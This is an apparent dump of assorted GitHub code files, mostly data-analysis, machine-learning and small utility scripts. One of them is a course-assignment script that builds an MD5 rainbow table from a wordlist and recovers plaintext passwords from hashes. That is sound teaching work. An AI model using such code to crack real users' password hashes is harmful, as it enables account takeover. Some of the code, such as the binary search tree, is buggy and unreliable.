in columns[0]:\n sentence.append(line.rstrip().split('\\t')[column])\n if len(sentence) > 0:\n sentences.append(sentence)\n return sentences\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--gold_file\", type=str)\nparser.add_argument(\"--pred_file\", type=str)\nparser.add_argument(\"--out_plot\", type=str)\nparser.add_argument(\"--column\", type=int, default=5)\nargs = parser.parse_args()\n\ny_true = read_conllu(args.gold_file, args.column)\ny_pred = read_conllu(args.pred_file, args.column)\n\nflat_y_true = [item for sublist in y_true for item in sublist]\nflat_y_pred = [item for sublist in y_pred for item in sublist]\n\nassert len(flat_y_true) == len(flat_y_pred)\n\nprint(classification_report(y_true, y_pred, digits=4))\nprint(accuracy_score(y_true, y_pred))\n\n# Creates a confusion matrix\nlabel_count = defaultdict(int)\nfor label in flat_y_true:\n label_count[label] += 1\n\nlabels = []\nfor l,c in label_count.items():\n if c > 20:\n labels.append(l)\n\ncm = confusion_matrix(flat_y_true, flat_y_pred, labels=labels)\ncm_df = pd.DataFrame(cm, index=labels, columns=labels)\n\nplt.figure(figsize=(50, 50))\nsns.heatmap(cm_df, annot=True, cmap=\"YlGnBu\")\nplt.ylabel('True label')\nplt.xlabel('Predicted label')\nplt.savefig(args.out_plot, bbox_inches='tight')\nplt.close()\n\n","repo_name":"ahmetustun/udapter","sub_path":"scripts/seq_eval.py","file_name":"seq_eval.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"16"} +{"seq_id":"5495328374","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 10 16:28:05 2021\n\n@author: lexipfalzgraf\n\"\"\"\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nHegelFreq=pd.read_csv('hegelFreq.csv')\nMacyFreq=pd.read_csv('macyFreq.csv')\nMontFreq=pd.read_csv('montFreq.csv')\nWebFreq=pd.read_csv('webFreq.csv')\nWilsonFreq=pd.read_csv('WilsonFreq.csv')\n\n\nplt.rcParams['font.sans-serif'] = \"Times New Roman\"\nplt.rcParams['font.family'] = \"sans-serif\"\nplt.locator_params(axis=\"x\", nbins=13)\nplt.locator_params(axis=\"y\", nbins=6)\nplt.xlabel(\"Year\", loc='center')\nplt.ylabel(\"Frequency of Usage by Author\", loc='center')\nplt.xticks(fontsize=10)\nplt.yticks(fontsize=10)\nplt.ylim(top=25) \nplt.ylim(bottom=0)\n\nMacyFreq['Rolling'] = MacyFreq['Frequence'].rolling(5).mean()\nMontFreq['Rolling'] = MontFreq['Frequence'].rolling(5).mean()\nWebFreq['Rolling'] = WebFreq['Frequence'].rolling(5).mean()\nWilsonFreq['Rolling'] = WilsonFreq['Frequence'].rolling(5).mean()\nHegelFreq['Rolling'] = HegelFreq['Frequence'].rolling(5).mean()\n\nHegelFreq['Rolling']= 100*HegelFreq['Rolling']\nMacyFreq['Rolling']= 100*MacyFreq['Rolling']\nMontFreq['Rolling']= 100*MontFreq['Rolling']\nWebFreq['Rolling']= 100*WebFreq['Rolling']\nWilsonFreq['Rolling']= 100*WilsonFreq['Rolling']\n\nplt.plot(HegelFreq['Year'], HegelFreq['Rolling'], label = \"Hegel\", color=\"gainsboro\",linewidth=1, linestyle=\"dashed\")\nplt.plot(MacyFreq['Year'], MacyFreq['Rolling'], label = \"Macy\", color=\"darkgrey\",linewidth=1, linestyle=\"dotted\")\nplt.plot(MontFreq['Year'], MontFreq['Rolling'], label = \"Montesquieu\", color=\"dimgrey\",linewidth=1, linestyle=\"dashdot\")\nplt.plot(WebFreq['Year'], WebFreq['Rolling'], label = \"Weber\", color=\"black\",linewidth=1, linestyle=\"solid\")\nplt.plot(WilsonFreq['Year'], WilsonFreq['Rolling'], label = \"Wilson\", color=\"lightgrey\",linewidth=1, linestyle=\"solid\")\n\n\nplt.legend(loc=1, prop={'size': 
7})\n\n#plt.savefig(\"freqAuthors.png\",dpi=200, bbox_inches=\"tight\")\nplt.show()\n\n","repo_name":"lpfalz/SpiritData","sub_path":"frequencePlot.py","file_name":"frequencePlot.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18092751800","text":"import hashlib\r\nfrom os import read\r\nimport re\r\n\r\npwdListLength = 1\r\nrainbowTable = []\r\n\r\n# Read in list of possible pwds + print no. of pwds processed\r\ndef processFile():\r\n global pwdListLength\r\n txtFile = open(\"Wordlist.txt\")\r\n list = []\r\n for word in txtFile:\r\n #remove '/n' from readIn and append to list\r\n list.append([word.strip('\\n'),False])\r\n print(\"No. of words read from file:\",len(list))\r\n pwdListLength = len(list)\r\n return list\r\n\r\n# Reduction Function\r\ndef reductionFunc(reduced):\r\n global pwdListLength\r\n reduced = re.sub(r'[a-zA-Z]',\"\",reduced) # remove all alphabetic char\r\n reduced = (int(reduced) * (pwdListLength % 32)) # modulo by length of passwordList \r\n reduced = str(reduced) # convert back to str\r\n return str(reduced[:6]) # return first six digits\r\n\r\n# Hash Function\r\ndef hashFunc(hashed):\r\n #encode var to bytes\r\n enc = bytes(hashed, encoding='utf-8')\r\n enc = hashlib.md5(enc)\r\n return (enc.hexdigest())\r\n\r\n# Reduce and Hash Function\r\ndef redHashFunc(finalValue):\r\n finalValue = reductionFunc(finalValue)\r\n return hashFunc(finalValue)\r\n\r\n# generate rainbowTable into txt file\r\ndef tableGenerator(rainbowTable):\r\n txtFile = open('Rainbowtable.txt','w')\r\n for i in rainbowTable:\r\n txtFile.write(\"%s %s \\n\" % (i[0],i[1]))\r\n txtFile.close\r\n print(\"Rainbowtable.txt consists of %s lines.\"%(len(rainbowTable)))\r\n\r\npasswordList = processFile()\r\n\r\nfor word in passwordList:\r\n word[1] = True\r\n pw = word[0]\r\n pw = hashFunc(pw)\r\n for i in range(5):\r\n pw = redHashFunc(pw)\r\n rainbowTable.append([word[0],pw])\r\n\r\n#sort table by hash values.\r\nrainbowTable = sorted(rainbowTable, key=lambda x:x[1]) \r\ntableGenerator(rainbowTable)\r\n\r\n# SECOND STEP\r\n# check if hash value exists in table\r\ndef checkHash(hash):\r\n for value in rainbowTable:\r\n if hash == value[1]:\r\n return (True,value)\r\n return (False,None)\r\n\r\ndef findHash(hash):\r\n count = 0\r\n while (count < 10000):\r\n hash = reductionFunc(hash)\r\n hash = hashFunc(hash)\r\n count += 1\r\n result = checkHash(hash)\r\n if (result[0]): \r\n #return word if found\r\n return result[1][0]\r\n print(\"Unable to identify hash\")\r\n exit()\r\n\r\n# function to check if word matches hash value\r\ndef checkWordHash(word,hash):\r\n count = 0\r\n word = hashFunc(word)\r\n while((word!=hash)):\r\n word = redHashFunc(word)\r\n count += 1\r\n if count>10000:\r\n print (\"Unable to match word to hash value\")\r\n exit()\r\n return True\r\n\r\n# user input\r\nhash_input=''\r\n\r\nwhile(True):\r\n print(\"\\nPlease enter hash value\")\r\n hash_input = input()\r\n if(len(hash_input) == 32): # check that hash value length is 32\r\n break\r\n else:\r\n print('Hash Value does not exist!')\r\n\r\nresult = checkHash(hash_input)\r\n\r\nif(result[0]):\r\n if(checkWordHash ( result[1][0], hash_input ) ):\r\n print(\"Pre-image of \",hash_input,\" found! 
The word is\",result[1][0])\r\nelse:\r\n word = findHash(hash_input)\r\n if(checkWordHash ( word, hash_input ) ):\r\n print(\"Pre-image of \",hash_input,\" The word is\", word)","repo_name":"kikoken831/CSIT622","sub_path":"old/Assignment 1/rainbowTable.py","file_name":"rainbowTable.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"70044476490","text":"# ToDo: Don't stretch line for over-spent time\n# Normal time input\n# Overall time on the title of figure\n\nimport argparse\nimport yaml\nimport re\nimport math\nimport pandas as pd\nfrom datetime import datetime\nfrom dateutil import parser\nfrom clockify import factories\nfrom clockify_api_client.client import ClockifyAPIClient\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\ndef match(done_project, done_task, target_task):\n target_task = str(target_task).strip().lower()\n if target_task.startswith('project:'):\n target_project = target_task[8:].strip()\n done_project = str(done_project).lower()\n return done_project == target_project\n elif target_task.startswith('task:'):\n target_desc = target_task[5:].strip()\n done_task = str(done_task).lower()\n return target_desc in done_task\n else:\n raise 'Unknown task description!'\n\n\ndef read_clockify(config):\n api_key = config['clockify']['api_key']\n workspace_name = config['clockify']['workspace_name']\n user_name = config['clockify']['user_name']\n\n workspace_id = None\n for workspace in factories.Workspace(api_key=api_key).get_all_workspaces():\n if (workspace['name'] == workspace_name) or (workspace_name == ''):\n workspace_id = workspace['id']\n if workspace_id is None:\n raise ValueError(f'workspace {workspace_name} not found!')\n\n user_id = None\n for user in factories.User(api_key=api_key).get_all_workspace_users(workspace_id=workspace_id):\n if (user['name'] == user_name) or (user_name == ''):\n user_id = user['id']\n if user_id is None:\n raise ValueError(f'user {user_name} not found!')\n\n client = ClockifyAPIClient().build(api_key, 'api.clockify.me/v1')\n projects = dict()\n for project in client.projects.get_projects(workspace_id):\n if not project['archived']:\n projects[project['id']] = project['name']\n\n entries = factories.TimeEntry(api_key=api_key).get_all_time_entry_user(workspace_id=workspace_id,\n user_id=user_id)\n return workspace_id, user_id, projects, entries\n\n\ndef process_entry(done, projects, task=None):\n elapsed = 0\n duration = done['timeInterval']['duration']\n if duration is None: # When clockify is running\n return 0\n r = re.match(r\"PT(\\d*H)?(\\d*M)?(\\d*S)?\", duration)\n if r.group(1):\n elapsed += int(r.group(1)[:-1])\n if r.group(2):\n elapsed += int(r.group(2)[:-1]) / 60\n if r.group(3):\n elapsed += int(r.group(3)[:-1]) / 3600\n\n if (task is None) or match(projects[done['projectId']], done['description'], task['Description']):\n return elapsed\n return 0\n\n\ndef process_entries(config, entries, projects):\n tasks_path = config['tasks']['file_path']\n sheet_name = config['tasks']['sheet_name']\n start_of_sprint = config['sprint']['start_of_sprint']\n end_of_sprint = start_of_sprint + len(config['sprint']['sprint_days']) * 86400\n total_sprint_time = sum(config['sprint']['sprint_days']) * config['sprint']['day_time']\n\n # Read tasks and sort to place tasks above projects\n # (to avoid double calculation of clockify entries which match both a project and a task)\n tasks = pd.read_excel(tasks_path, 
sheet_name=sheet_name).sort_values('Description', ascending=False).reset_index(\n drop=True)\n total_scheduled_hours = sum(tasks['Estimated Hours'])\n\n # Process time entries\n results = [[0.0, float(d['Estimated Hours']), d['Description']] for i, d in\n tasks.iterrows()] # (spend_hours, estimated_hours)\n\n processed_ids = [] # get_all_time_entry_user returns each entry multiple times, so we need to check them.\n off_schedule_spent = 0\n for entry in entries:\n date = parser.parse(entry['timeInterval']['start']).timestamp()\n if (start_of_sprint <= date < end_of_sprint) and (entry['id'] not in processed_ids):\n entry_matched = False\n processed_ids.append(entry['id'])\n for i, t in tasks.iterrows():\n elapsed_time = process_entry(done=entry, projects=projects, task=t)\n results[i][0] += elapsed_time\n if elapsed_time > 0:\n entry_matched = True\n break\n if not entry_matched:\n off_schedule_spent += process_entry(done=entry, projects=projects)\n\n results.append([off_schedule_spent, total_sprint_time - total_scheduled_hours, 'Off-scheduled'])\n return results, total_scheduled_hours\n\n\ndef plot_results(config, results, total_scheduled_hours):\n total_sprint_time = sum(config['sprint']['sprint_days']) * config['sprint']['day_time']\n start_of_sprint = config['sprint']['start_of_sprint']\n sprint_days = config['sprint']['sprint_days']\n\n df = []\n for r in results:\n df.append(['Spent', r[0] / r[1], r[0], r[2]])\n df.append(['Estimated', 1, r[1], r[2]])\n df = pd.DataFrame(df, columns=['Type', 'Hours-Rate', 'Hours-Val', 'Task'])\n\n sns.set(rc={'figure.figsize': (14, 6)}, font_scale=1)\n g = sns.barplot(x=\"Hours-Rate\", y=\"Task\",\n hue=\"Type\", data=df, palette='copper')\n g.legend_ = None\n g.set(xticklabels=[])\n g.set(xlabel='Hours')\n total_spent_scheduled_hours = sum(\n [min(r[0], r[1]) for r in results[:-1]]) # Just scheduled tasks. 
Times spent more than scheduled not considered\n total_spent_hours = sum([r[0] for r in results])\n\n # Compute expected progress\n passed_full_days = math.floor((datetime.now().timestamp() - start_of_sprint) / 86400)\n working_full_days = sum(sprint_days[:passed_full_days])\n if passed_full_days < len(sprint_days):\n today_expected_progress = (datetime.now().timestamp() - (start_of_sprint + passed_full_days * 86400)) * sprint_days[passed_full_days]\n else:\n today_expected_progress = 0\n expected_progress = (working_full_days * 86400 + today_expected_progress) / (sum(sprint_days)*86400) * 100\n\n g.set(title=f\"Tasks achievement: {total_spent_scheduled_hours / total_scheduled_hours * 100:.1f}% - \" +\n f\"Total time: {total_spent_hours / total_sprint_time * 100:.1f}% - \" +\n f\"Expected: {expected_progress:.1f}%\")\n\n for i, container in enumerate(g.containers):\n if i == 0: # spent\n g.bar_label(container, [f\"{r[0] / r[1] * 100:.1f}%\" for r in results])\n else: # estimated\n g.bar_label(container, [f\"{r[1]:.2f}\" for r in results])\n plt.subplots_adjust(left=0.25)\n plt.show()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config', type=argparse.FileType('r'),\n default='config.yml', help='config file for %(prog)s')\n args = parser.parse_args()\n config = yaml.load(args.config.read(), Loader=yaml.SafeLoader)\n\n try:\n workspace_id, user_id, projects, entries = read_clockify(config=config)\n results, total_scheduled_hours = process_entries(config=config,\n entries=entries,\n projects=projects)\n plot_results(config=config,\n results=results,\n total_scheduled_hours=total_scheduled_hours)\n except ValueError as err:\n print(err.args)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"h-amirkhani/clockify-scrum","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"24702619797","text":"from torch import nn\nfrom torch.nn import TransformerEncoder, TransformerEncoderLayer, Parameter, Linear, Module, ReLU, GELU\n\n\nclass TransformerBlock(Module):\n def __init__(self, d_model, nhead, dff, activation, num_layers):\n super().__init__()\n assert activation in ['relu', 'gelu']\n if activation == 'relu':\n self.activation = ReLU(inplace=True)\n elif activation == 'gelu':\n self.activation = GELU()\n self.transformer_block = TransformerEncoder(\n TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=dff, activation=activation,\n batch_first=True, dropout=0.), num_layers=num_layers)\n\n def forward(self, x):\n return self.transformer_block(x)\n","repo_name":"caihao/SWD-EvtGen","sub_path":"src/models/backbone.py","file_name":"backbone.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"6469939681","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 16 12:03:23 2019\n\n@author: zhangzhaopeng\n\"\"\"\n\n## binary search tree\n\nclass TreeNode():\n \n def __init__(self, value):\n self.val = value\n self.left = None\n self.right = None\n\nclass binary_search_tree():\n \n def __init__(self):\n \n self.root = None\n \n# def insert(self, val):\n# \n# s = TreeNode(val)\n# if self.root == None:\n# self.root = s\n# else:\n# if s.val < self.root.val:\n# self.insert(root.left, s)\n# else:\n# self.insert(root.right, s)\n \n def insert(self, val):\n \n node = TreeNode(val)\n if 
self.root == None:\n self.root = node\n else:\n cur = self.root\n if val < cur.val:\n if cur.left == None:\n cur.left = node\n else:\n if cur.right == None:\n cur.right = node\n \n\n# def insert(self, value: int):\n# if not self.root:\n# self.root = TreeNode(value)\n# return\n# parent = None\n# node = self.root\n# while node:\n# parent = node\n# node = node.left if node.val > value else node.right\n# new_node = TreeNode(value)\n# if parent.val > value:\n# parent.left = new_node\n# else:\n# parent.right = new_node\n \n def delete(self, val):\n \n node = self.root\n parent = None\n while node and node.val != val:\n parent = node\n node = node.left if node.val > val else node.right\n \n if not node:\n return \n \n if node.left == None and node.right == None:\n parent.left = None\n \n elif node.left == None:\n parent.left = node.right\n elif node.right == None:\n parent.left = node.left\n else:\n par = node\n s = node.right\n while s.left:\n par = s\n s = s.left\n node.val = s.val\n if par == node:\n par.right = s.right\n else:\n par.left = s.right\n \n def find(self, val):\n \n node = self.root\n while node and node.val != val:\n node = node.left if node.val > val else node.right\n return node\n\n\n# test\n\nt = binary_search_tree()\nt.insert(1)\nt.insert(2)\nt.insert(3)\n\nt.delete(3)\n\nt.find(1)\n\n\n\n\n","repo_name":"zhangzhp7/Algorithm","sub_path":"binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43627318467","text":"# 638/378\nfrom sys import stdin\nfrom re import compile\n\ndef parse_lines(lines):\n # hcl:#6b5442 ... -> [('hcl', '#6b5442'), ...]\n return [(typ, v) for line in map(lambda x: map(lambda x: x.split(':'), x.split(' ')), lines.split('\\n')) for typ, v in line]\n\ndata = list(map(parse_lines, stdin.read().strip().split('\\n\\n')))\n# Rules for A\nneeded = ['byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid']\n# Rules for B\nhgt, hcl, pid = compile('^(\\d+)(cm|in)$'), compile('^#[0-9a-f]{6}$'), compile('^\\d{9}$')\necl = ['amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth']\n\ndef valid(typ, v):\n if typ == 'byr':\n return 1920 <= int(v) <= 2002\n if typ == 'iyr':\n return 2010 <= int(v) <= 2020\n if typ == 'eyr':\n return 2020 <= int(v) <= 2030\n if typ == 'hgt':\n matches = hgt.match(v)\n if matches is None:\n return False\n n, u = matches.groups()\n return 150 <= int(n) <= 193 if u == 'cm' else 59 <= int(n) <= 76\n if typ == 'hcl':\n return hcl.match(v) is not None\n if typ == 'ecl':\n return v in ecl\n if typ == 'pid':\n return pid.match(v) is not None\n return True\n\na, b = 0, 0\nfor pp in data:\n if all(n in [typ for typ, _ in pp] for n in needed):\n a += 1\n if all(valid(typ, v) for typ, v in pp):\n b += 1\n\nprint('a', a)\nprint('b', b)\n","repo_name":"stristr/aoc2020","sub_path":"04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38375758085","text":"from flask_app.config.mysqlconnection import connectToMySQL\n\nfrom flask import flash \n\nclass Book_Author:\n def __init__(self,data):\n self.book_id = data['book_id']\n self.author_id = data['author_id']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n\n# ============================================= \n# INSERT : new book / author ids\n# ============================================= \n @classmethod\n def 
add_new_book_author(cls,data):\n query = \"INSERT INTO books_authors (book_id,author_id) VALUES (%(book_id)s, %(author_id)s);\"\n results = connectToMySQL('book_club').query_db(query,data)\n return results","repo_name":"bakerlisa/NightOwl","sub_path":"flask_app/models/book_author_model.py","file_name":"book_author_model.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"9541884799","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '1.0'\n\nsetup(name='collective.mdlevent',\n version=version,\n description=\"Multi dates and locations event for Plone\",\n long_description=open(\"README.rst\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n # Get more strings from\n # http://pypi.python.org/pypi?:action=list_classifiers\n classifiers=[\n \"Programming Language :: Python\",\n \"Framework :: Plone\",\n \"Framework :: Plone :: 4.0\",\n \"Framework :: Plone :: 4.1\",\n \"Framework :: Plone :: 4.2\",\n ],\n keywords='',\n author='',\n author_email='',\n url='http://svn.plone.org/svn/collective/',\n license='GPL',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['collective'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'plone.app.dexterity',\n 'five.grok',\n 'z3c.blobfile',\n # -*- Extra requirements: -*-\n ],\n extras_require = dict(\n tests=['plone.app.testing'],\n ),\n entry_points=\"\"\"\n # -*- Entry points: -*-\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n )\n","repo_name":"toutpt/collective.mdlevent","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"42030679722","text":"from django.forms.models import model_to_dict\nfrom rpc4django import rpcmethod\n\nimport molecule.models as molecule_models\n\n@rpcmethod(name='molecule.ping', signature=[])\ndef ping():\n return 'PONG'\n \n\n@rpcmethod(name='molecule.list', signature=[])\ndef list():\n molecules = molecule_models.Molecule.objects.all()\n x = [model_to_dict(molecule) for molecule in molecules]\n\n return x","repo_name":"rmcl/rcell","sub_path":"rcell-kb/kb/core/molecule/rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2822541870","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 27 17:53:25 2021\r\n\r\n@author: Nishith\r\n\"\"\"\r\n\r\nn=input(\"Please enter a number: \")\r\nsum=0\r\nn=eval(n)\r\nfor i in range(1,n+1):\r\n sum=sum+i*i*i\r\nprint(sum)\r\n","repo_name":"Nishith170217/Python-Self-Challenge","sub_path":"Program for cube sum of first n natural numbers.py","file_name":"Program for cube sum of first n natural numbers.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71990774407","text":"import scrapy,re\nfrom bs4 import BeautifulSoup as bs\n\nclass FddbSpider(scrapy.Spider):\n \"\"\"\n Scrapy spider meant to crawl all nutritional information \n about a product from http://fddb.info\n \"\"\"\n name = \"fddb\"\n start_urls = [\n \"http://fddb.info/db/fr/groupes/{}/index.html\".format(group)\n for group in [\n \"epice\", \"boissons\", \"congelateur\", \"fromages\", \n \"garniture\", \"international\", \"legumineuse\", 
\"mets\", \n \"pomme_de_terre\", \"viande\", \"autre\", \"cereale\", \n \"friterie\", \"fruits\", \"huiles_et_lipides\", \"legumes\", \n \"laitage\", \"poisson\", \"sucreries\"]\n ]\n\n \n def parse(self, response):\n # Parse groups if there are any\n groups_b = response.css('div.leftblock h3:first-child::text').extract_first()\n if groups_b:\n # Follow the \"groups\" links \n groups = response.css('div.leftblock div.standardcontent:first-child table td table td:first-child a::attr(href)').extract()\n for group in groups:\n group_page = response.urljoin(group.strip())\n yield scrapy.Request(group_page, callback=self.parse)\n \n # Parse producers if there are any\n producers_b = response.css('div.leftblock h4.grouppreproducthead::text').extract_first()\n if producers_b:\n nb_child = \"n + 2\" if groups_b else \"n\"\n query = 'div.leftblock > div:nth-child({}) table a::attr(href)'.format(nb_child)\n products = response.css(query).extract()\n for product in products:\n product_page = response.urljoin(product.strip())\n yield scrapy.Request(product_page, callback=self.parse_product)\n \n\n\n def parse_product(self, response):\n nutriments = []\n value_unit_re = r\"^([\\d,]+)\\s(\\w+)$\"\n \n # Extracts all nutriments information\n if response.css(\"div.leftblock div.itemsec2012:first-child h2::text\").extract_first():\n rows = response.css('div.itemsec2012:first-child ~ div > div').extract() \n # Even rows are nutriments' names, odd rows are nutriments' values and units\n i = 0\n while i < len(rows)-1:\n nutriment = {}\n html_name = bs(rows[i], 'html.parser')\n html_value = bs(rows[i+1], 'html.parser')\n i += 2\n\n # Skip \"Water content\"\n name = html_name.span.string\n if \"Water\" in name:\n continue\n \n # Rename nutriments with the names \n # already present in our ElasticSearch (ES) instance\n if name == \"Valeur énergétique\":\n name = \"Énergie\"\n elif name == \"Calorie\":\n name = \"Énergie (kCal)\"\n elif name == \"Lipides\":\n name = \"Matières grasses\"\n elif name == \"Sucre\":\n name = \"Sucres\"\n \n # Sperate values and units\n value, unit = re.match(value_unit_re, html_value.text).groups()\n value = float(value.replace(',', '.'))\n\n if unit == \"kcal\":\n unit = \"kCal\"\n\n nutriment['name'] = name\n nutriment['unit'] = unit\n nutriment['per_day'] = 0\n nutriment['per_portion'] = 0\n nutriment['per_hundred'] = value\n nutriment['rdi'] = 0\n \n nutriments.append(nutriment)\n \n unit = 'ml' if 'ml' in response.css(\"div.leftblock div.itemsec2012:first-child h2::text\").extract_first() else 'g'\n # Output ready to be sent to ES\n yield {\n '_index': \"products\",\n '_type': \"FDDB\",\n '_source': {\n 'name': self.clean_name(response.css(\"h1#fddb-headline1::text\").extract_first()),\n 'unit': unit,\n 'unit_quantity': unit,\n 'unit_portion': 0,\n 'quantity': 100,\n 'nutriments': nutriments\n }\n }\n\n def clean_name(self, name):\n # Removes generic words inside product name\n reg = r\",\\s(\"\\\n \"séché[es]*|\" \\\n \"sèches?|\" \\\n \"secs?|\" \\\n \"cuit[es]*|\" \\\n \"grain[es]*|\" \\\n \"frais|\" \\\n \"fra[iî]ches?|\" \\\n \"cru[es]*|\" \\\n \"en moyenne|\" \\\n \"moyen(ne)?\" \\\n \")$\"\n return re.sub(reg, '', name)\n","repo_name":"zifeo/Food-habits","sub_path":"0-mining/fddb.py","file_name":"fddb.py","file_ext":"py","file_size_in_byte":4699,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"41122116181","text":"from rest_framework import serializers\nfrom rest_framework.viewsets import ModelViewSet\nfrom 
parflow_data_management.scheduler.models.workflow import Workflow\n\nclass WorkflowSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Workflow\n        fields = (\"id\", \"project\")\n\nclass WorkflowViewSet(ModelViewSet):\n    queryset = Workflow.objects.all()\n\n    serializer_class = WorkflowSerializer\n","repo_name":"cjh1/parflow_data_management","sub_path":"parflow_data_management/scheduler/rest/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"38046980899","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"Implement the kNN (nearest-neighbour) algorithm with TensorFlow\"\"\"\n\n\ngroup1_x1 = np.random.random(100) * 2\ngroup1_x2 = np.random.random(100) * 2\ngroup1_y = np.ones(group1_x1.shape)\ngroup2_x1 = np.random.random(100) * 2 + 1\ngroup2_x2 = np.random.random(100) * 2 + 1\ngroup2_y = np.zeros(group2_x1.shape)\n\ntrain_x1 = np.concatenate([np.reshape(group1_x1, [-1, 1]), np.reshape(group1_x2, [-1, 1])], axis=1)\ntrain_x2 = np.concatenate([np.reshape(group2_x1, [-1, 1]), np.reshape(group2_x2, [-1, 1])], axis=1)\ntrain_x = np.concatenate([train_x1, train_x2], axis=0)\ntrain_y = np.concatenate([np.reshape(group1_y, [-1, 1]), np.reshape(group2_y, [-1, 1])], axis=0)\n\n\n\n\ndef kNN():\n    input_x = tf.placeholder(tf.float32, [None, 2], name='input_x')\n    label_y = tf.placeholder(tf.float32, [None, 1], name='label_y')\n\n    test_x = tf.placeholder(tf.float32, [2], name='test_x')\n\n    distance = tf.reduce_mean(tf.square(test_x - input_x), axis=1)\n    # 1-NN: the predicted label comes from the training point with the smallest distance\n    predict = tf.gather(label_y, tf.argmin(distance, axis=0))\n\n    return input_x, label_y, test_x, predict\n\ndef eval(test_sample):\n    input_x, label_y, test_x, predict = kNN()\n    with tf.Session() as sess:\n        feed_dict = {input_x:train_x, label_y:train_y, test_x:test_sample}\n        predict_label = sess.run(predict, feed_dict)\n        print('Prediction:{}'.format(predict_label[0]))\n        show_figure(test_sample)\n    return predict_label\n\ndef show_figure(test_sample):\n    plt.scatter(group1_x1, group1_x2, color='blue')\n    plt.scatter(group2_x1, group2_x2, color='yellow')\n    plt.scatter(test_sample[0], test_sample[1], color='red')\n    plt.show()\n\n\n\nif __name__ == '__main__':\n    test_sample = np.array([2.2, 2.2])\n    eval(test_sample)\n\n","repo_name":"AgFeather/StudyNote","sub_path":"models/TFBasicML/kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22864488908","text":"import math\nfrom collections import defaultdict\n\n\nclass MetricsTracker(object):\n    \"\"\" Tracking metrics. 
\"\"\"\n\n def __init__(self):\n self.metrics_val = defaultdict(float) # for one batch\n self.metrics_avg = defaultdict(float) # avg batches\n self.num_samples = 0\n\n def update(self, metrics, num_samples):\n for key, val in metrics.items():\n if val is not None:\n val = float(val) # [val] -> val\n self.metrics_val[key] = val\n avg_val = \\\n (self.metrics_avg.get(key, 0) * self.num_samples + val * num_samples) / \\\n (self.num_samples + num_samples)\n self.metrics_avg[key] = avg_val\n self.num_samples += num_samples\n\n def clear(self):\n self.metrics_val = defaultdict(float)\n self.metrics_avg = defaultdict(float)\n self.num_samples = 0\n\n def items(self):\n return self.metrics_avg.items()\n\n def get(self, name):\n if self.num_samples == 0:\n raise ValueError('There is no data in Metrics.')\n return self.metrics_avg.get(name)\n\n def state_dict(self):\n return {\n 'metrics_val': self.metrics_val,\n 'metrics_avg': self.metrics_avg,\n 'num_samples': self.num_samples,\n }\n\n def load_state_dict(self, state_dict):\n self.metrics_val = state_dict['metrics_val']\n self.metrics_avg = state_dict['metrics_avg']\n self.num_samples = state_dict['num_samples']\n\n def value(self):\n metric_strs = []\n for key, val in self.metrics_val.items():\n metric_str = f'{key.upper()}-{val:.3f}'\n metric_strs.append(metric_str)\n if 'token_nll' in self.metrics_val:\n metric_str = f\"TOKEN_PPL-{math.exp(self.metrics_val['token_nll']):.3f}\"\n metric_strs.append(metric_str)\n metric_strs = ' '.join(metric_strs)\n return metric_strs\n\n def summary(self):\n metric_strs = []\n for key, val in self.metrics_avg.items():\n metric_str = 